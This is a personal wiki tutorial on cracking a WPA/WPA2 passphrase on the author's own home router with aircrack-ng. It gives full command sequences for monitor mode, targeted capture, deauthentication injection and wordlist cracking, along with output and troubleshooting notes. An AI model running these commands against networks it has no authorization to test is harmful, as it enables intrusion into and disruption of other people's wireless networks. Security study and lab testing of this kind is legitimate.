Aircrack/WPA Cracking
From charlesreid1
Now that we've successfully walked through using Aircrack to crack WEP on our home router on the Aircrack/WEP Cracking page, let's try attacking the router in WPA encrypted mode.
Notes on wireless in Kali 2.0: Kali_2.0/Wireless_Debugging
Contents
The Background
As with the WEP attack we covered, this attack will use aircrack-ng to capture handshake packets, as many as possible, then use those packets to brute-force guess the wireless network's passphrase.
WPA or WPA2?
From here:
There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.
Here's what the security settings page might look like:
The Hardware
The hardware for simulating this attack on my home network consisted of:
- a router/wireless access point - this router controls the wireless network being attacked
- a laptop running Kali Linux - this is where the attack is being launched from
- a third party on the network (e.g., a phone or a desktop) - not sure if this is necessary
The Software
You'll need a laptop running Kali, which will have aircrack-ng installed. That should be all the software you need.
The Procedure
Set Your Router to WPA
Before doing anything else, we'll change the wireless security protocol of the router to either WPA or mixed WPA/WPA2 encryption.
Now let's pick an easy password, for the sake of example. Like, uh, the word password.
Now we've got our WPAWPA2-enabled router with our super-secure password of "password" - time to get to work.
Change Your Mac Address
Check Wireless Devices
Now that you have your WPAWPA2 network enabled, open up your Kali laoptop. Check the wireless devices available on the computer:
$ iwconfig
Once again, we'll be using the Panda Wireless USB dongle at wlan2.
Switch Wireless Device to Monitor Mode
Now use Aircrack to put the wireless device into monitoring mode:
$ airmon-ng start wlan2
This will take wlan2 down and replace it with wlan2mon.
Now we're ready to scan available networks and find our WPAWPA2 router.
Scan Networks
Now you can scan the wireless access points around you by running:
$ airodump-ng wlan2mon
Make a note of your target router's channel number and MAC address.
Begin the Attack
Window 1: Monitor Traffic on the Network
In the first window, monitor traffic going to/from the target router by running a more targeted airodump-ng:
$ airodump-ng -d AA:BB:CC:DD:EE -c XX -w aircrack_output wlan2mon
or,
$ airodump-ng --bssid AA:BB:CC:DD:EE --channel XX -w aircrack_output wlan2mon
Make sure you've killed your prior-running airodump command, which was hopping channels, or this command will not work.
Find the Sheep
The weakness we're taking advantage of in WPA is the handshake process: when a client (an unsuspecting sheep) authenticates with the network and sends the encrypted password so the network can verify the client. If an attacker captures packets during this handshake process, they have the encrypted password and can try and crack the sheep's passphrase by brute force.
That means we need to find a sheep that will broadcast their passphrase to the router and anyone else who will listen. So once you're ready, and listening to the network, connect your sheep to the network. (This might be a computer playing internet radio, for example.)
Window 2: Deauthenticate Sheep
The next step is to deauthenticate the sheep.
In window 2, we'll use aireplay to craft deauth packets and send them to the sheep:
$ aireplay-ng -0 1 -a <access point mac address> -c <sheep mac address> wlan2mon
or,
$ aireplay-ng --deauth 1 -a <access pt mac addr> -c <sheep mac addr> wlan2mon
This will generate fake deauthentication packets and send them to the sheep. The sheep will think it has been deauthenticated and kicked off the network. Lonely and desperate and bleating madly, the sheep will begin to broadcast its packets to anyone who will listen - including its encoded passphrase.
If we're listening, we can hear it, and use Aircrack to crack it.
This is Attack Mode Zero in the Aircrack manual.
Finish the Attack
Now we've got what we need in our network capture file. Let's try and crack this password.
You can use whatever you want for your wordlist, if you're attacking a network with a known passkey, just make sure it's in there. I downloaded a list of the 10,000 most common passwords ("password" is number one on the list) from SecLists on GitHub.
Now run Aircrack against the captured data to crack the WPA key, specifying the wordlist:
$ aircrack-ng -w ./10k_most_common.txt aircrack_output-05.cap
and, if you're lucky, you'll see something like this:
Aircrack-ng 1.2 rc2
[00:00:00] 5 keys tested (669.62 k/s)
KEY FOUND! [ password ]
Master Key : 8A D8 38 DD C7 05 39 9F 02 DE 96 0F 98 E1 C2 EF
01 D0 A8 C4 75 C9 4A C3 04 32 E8 21 53 9E D5 1A
Transient Key : FC BB DD FE 34 37 AC 42 D6 15 06 70 0A 2A 6B B0
D6 1C 6A 5C 3B 1D EE 40 C8 20 10 D1 7C 0F 5B A2
5A 92 8A 70 E6 36 2C DA 3E 36 6E CB AE F1 1B FC
78 C5 54 82 BA 84 3F DE 2D 7A BD A0 BD E0 40 AB
EAPOL HMAC : 84 B2 3D 30 2D A0 87 D1 A3 2A AC 14 71 28 B5 82
Troubleshooting
Passphrase Not Found
This was the first result I saw, when I tried to crack my wireless password "password" with a wordlist that had "password" right there at the top:
$ aircrack-ng -w ./10k_most_common.txt aircrack_output-05.cap
Opening aircrack_output-05.cap
Read 81013 packets.
# BSSID ESSID Encryption
1 74:85:2A:97:5B:08 Walrus WPA (1 handshake)
Choosing first network as target.
Opening aircrack_output-05.cap
Reading packets, please wait...
Aircrack-ng 1.2 rc2
[00:00:00] 192 keys tested (1269.55 k/s)
[00:00:00] 392 keys tested (1287.03 k/s)
Current passphrase: cadillac
[00:00:00] 592 keys tested (1298.17 k/s)
Current passphrase: mariners
Master Key [00:00:00] 788 keys tested (1293.03 k/s)D8 A2 0A 61
Current passphrase: commando
Master Key [00:00:00] 988 keys tested (1293.68 k/s)53 1E 22 F4
Transient Key : Current passphrase: films+pic+galeries
Master Key [00:00:00] 1188 keys tested (1297.01 k/s)2 B4 8F 19
Transient Key : Current passphrase: vikings1
Master Key [00:00:01] 1384 keys tested (1298.15 k/s)D 64 31 3D
Transient Key : Current passphrase: hotmail1
Master Key [00:00:01] 1580 keys tested (1298.30 k/s)C F2 54 2D
Transient Key : Current passphrase: aviation
Master Key [00:00:01] 1776 keys tested (1298.07 k/s)9 65 C7 52
Transient Key : Current passphrase: riffraff
Master Key [00:00:01] 1964 keys tested (1293.49 k/s)5 DD 08 AF
Transient Key : Current passphrase: smirnoff
Master Key : EE 79 F1 E6 3B EF 37 9C A3 19 51 A8 23 CF 0D 46
Transient Key : Current passphrase: skeeter1
Master Key : 60 C0 2086 24 0B 1C 72 9A 86 17 74 52 08 A8 90
Transient Key : B3 18 CB 94 68 ED 4C 8A 67 DF 0C D6 29 66 8A DB
Master Key : 35 33 85 0F 54 DC 5F 69 24 54 04 CE D6 D6 C9 D9
Transient Key : 2F A2 7C 56 47 49 2B 81 68 37 3B 69 67 FF AF DE
EAPOL HMAC : 14 24 17 98 75 9D E4 AE EB F1 5E BC D2 20 30 CE
Transient Key : 21 B2 25 2B 69 56 60 2D BD 87 18 97 10 07 91 84
EAPOL HMAC : 06 14 B6 BE 7B 44 9C B1 51 65 C4 85 BF F7 FF D9
3D A3 16 29 55 33 10 70 C5 B0 59 B6 11 1B 2C 9E
EAPOL HMAC : 69 89 39 67 39 D8 95 C3 33 26 A7 9B 31 53 B3 B7
Passphrase not in dictionary
Quitting aircrack-ng...
Oh?
Possible Failure Points
Aircrack can only crack pre-shared keys (PSK). Is my wireless network listed as having PSK? Yes. (AUTH column in airomon-ng)
Aircrack can only handle dictionary words and short passphrases. Is my test router's password too hard? Pretty sure that if a password cracker can't crack a password of "password," it is an abject failure.
Not letting it run long enough? I suspect this may be the issue.
Problems with packet injection? No, everything looks okay. Here are Aircrack/Packet Injection Testing notes.
Something peculiar about my network? Possibly. Almost definitely. Successful on two other different wireless router makes/models.
Wireshark for Troubleshooting
Can use Wireshark to analyze some of these packet captures. From this site: " Use Wireshark and apply a filter of 'eapol'. This displays only eapol packets you are interested in. Thus you can see if capture contains 0,1,2,3 or 4 eapol packets."
From this page comes a great explanation of how to analyze those packets.
On the first successful network, filtering for eapol packets shows that we had four different sources, which took about 10 minutes to capture.
On the second successful network, filtering eapol packets shows three different sources, and those took about 15 minutes to capture.
On the network setup that is failing, filtering eapol packets shows eapol packets coming from a single destination, despite an hour of capturing packets.
On another (failed) attempt against a network that was later successfully attacked, we had only two sources of eapol packets.
All in all, this means you may need multiple clients on the network - as I observed, the important thing is not having a lot of traffic but having a lot of clients connected and sending EAPOL packets.
TL; DR
Aright, smartass, here you go:
$ airmon-ng # list wireless devices $ airmon-ng start wlan2 # put wlan2 in monitor mode $ airodump-ng wlan2mon # monitor $ airodump-ng --bssid AA:BB:CC:DD:EE -c XX -w aircrack_output wlan2mon # capture packets from target network $ aircrack-ng -w ./wordlist.txt aircrack_output-01.cap # crack the passphrase
 |
aircrack-ng a suite of tools for wireless cracking.
aircrack-ng Many Ways to Crack a Wifi: Cracking Wifi Aircrack Benchmarking: Aircrack/Benchmarking WEP Attacks with Aircrack: Aircrack/WEP Cracking WPA Attacks with Aircrack: Aircrack/WPA Cracking Aircrack Hardware: Aircrack/Packet Injection Testing Harvesting Wireless Network Information
airodump-ng Basic Usage of Airodump
Category:Security · Category:Wireless · Category:Passwords
|